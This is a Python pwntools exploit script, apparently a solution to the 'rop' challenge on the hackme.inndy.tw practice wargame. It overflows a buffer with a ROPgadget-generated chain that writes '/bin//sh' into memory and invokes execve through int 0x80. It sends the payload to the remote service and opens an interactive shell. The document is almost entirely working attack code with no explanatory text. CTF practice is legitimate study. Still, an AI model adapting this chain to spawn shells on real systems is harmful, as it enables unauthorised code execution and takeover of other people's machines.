51 lines
1.7 KiB
Python
51 lines
1.7 KiB
Python
#!/usr/bin/env python2
|
|
from pwn import *
|
|
from LibcSearcher import *
|
|
from struct import pack
|
|
import os
|
|
context(arch = "i386",os = "linux", log_level = "debug")
|
|
|
|
# ROPgadget --binary rop --ropchain
|
|
|
|
# Padding goes here
|
|
p = 0x10*'0'
|
|
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea060) # @ .data
|
|
p += pack('<I', 0x080b8016) # pop eax ; ret
|
|
p += '/bin'
|
|
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea064) # @ .data + 4
|
|
p += pack('<I', 0x080b8016) # pop eax ; ret
|
|
p += '//sh'
|
|
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea068) # @ .data + 8
|
|
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
|
|
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
|
|
p += pack('<I', 0x080481c9) # pop ebx ; ret
|
|
p += pack('<I', 0x080ea060) # @ .data
|
|
p += pack('<I', 0x080de769) # pop ecx ; ret
|
|
p += pack('<I', 0x080ea068) # @ .data + 8
|
|
p += pack('<I', 0x0806ecda) # pop edx ; ret
|
|
p += pack('<I', 0x080ea068) # @ .data + 8
|
|
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0807a66f) # inc eax ; ret
|
|
p += pack('<I', 0x0806c943) # int 0x80
|
|
|
|
io = remote("hackme.inndy.tw", 7704)
|
|
#io = process('./rop')
|
|
io.sendline(p)
|
|
io.interactive()
|